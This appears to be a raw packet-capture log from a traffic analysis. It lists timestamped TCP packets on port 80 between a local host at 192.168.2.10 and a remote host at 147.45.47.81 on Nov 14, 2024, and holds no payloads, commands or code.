                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270657063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270658016 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270677090 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270695925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270708084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270721912 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270823956 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270848036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270976067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270987034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.270996094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271006107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271017075 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271017075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271025896 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271028042 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271038055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271048069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271058083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271116018 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271116972 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271123886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271135092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271146059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271156073 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271255970 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271266937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271276951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271281004 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271286964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271296978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271306038 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271306992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271325111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271326065 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271336079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271344900 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271346092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271356106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271368027 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271383047 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271385908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271395922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271406889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271416903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271419048 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271428108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271439075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271437883 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271552086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271564007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271574974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271579981 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271584988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271595955 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271605968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271616936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271616936 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271626949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271631002 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271708965 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271719933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271724939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271734953 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271744013 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271744967 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271755934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271765947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271775961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271786928 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271790028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271801949 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271852016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271862030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271872044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271872997 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271882057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271931887 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.271931887 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.285909891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.286835909 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.294919968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.294935942 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.294945955 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.294956923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.294969082 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.294979095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.294990063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.295000076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.295015097 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.295160055 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.323436975 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.323460102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.323471069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.323625088 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.333646059 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.335572004 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350578070 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350591898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350609064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350620031 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350630999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350640059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350716114 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350718021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350716114 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350730896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350742102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.350764036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.351732969 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375190973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375205994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375217915 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375227928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375238895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375250101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375261068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375268936 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375297070 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375350952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375361919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375372887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375384092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375412941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375423908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375433922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375437975 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375443935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375454903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375464916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375468969 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375477076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375483036 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375488997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375509024 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375660896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375673056 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375686884 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375694990 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375699043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375710964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375716925 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375724077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375816107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375832081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375843048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375845909 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375853062 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375863075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375874043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375884056 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375895023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375900030 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375900030 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375905991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375916958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375926971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375936985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375946045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375960112 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375967026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375978947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375989914 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.375993967 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376008034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376018047 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376020908 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376029015 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376039982 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376044035 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376053095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376063108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376072884 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376074076 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376082897 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376091957 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376101971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376111984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376121998 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376133919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376143932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376151085 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376194000 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376194000 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376467943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376480103 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376490116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376499891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376509905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376521111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376524925 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376530886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376540899 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376548052 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376553059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376568079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376564026 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376579046 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376589060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376591921 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376600981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376610994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376616955 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376616955 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376621962 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376632929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376642942 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376650095 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376652956 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376663923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376668930 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376676083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376833916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376852989 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376857042 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376863956 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376873970 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376883984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376893997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376899004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376909018 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376919985 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376919985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376926899 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376930952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376943111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.376960039 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377279043 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377279043 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377285004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377295971 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377306938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377316952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377327919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377341032 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377343893 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377355099 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377363920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377365112 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377374887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377384901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377393961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377404928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377413988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377415895 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377415895 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377424002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377434969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377446890 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377459049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377461910 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377470016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377475977 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377480984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377491951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377501965 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377512932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377522945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377525091 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377533913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377543926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377554893 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377556086 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377566099 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377572060 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377577066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377585888 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377589941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377599955 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377609968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377621889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377623081 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377630949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377641916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377651930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377656937 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377662897 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377671957 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377679110 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377688885 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377697945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377708912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.377712011 CET4995880192.168.2.10147.45.47.81
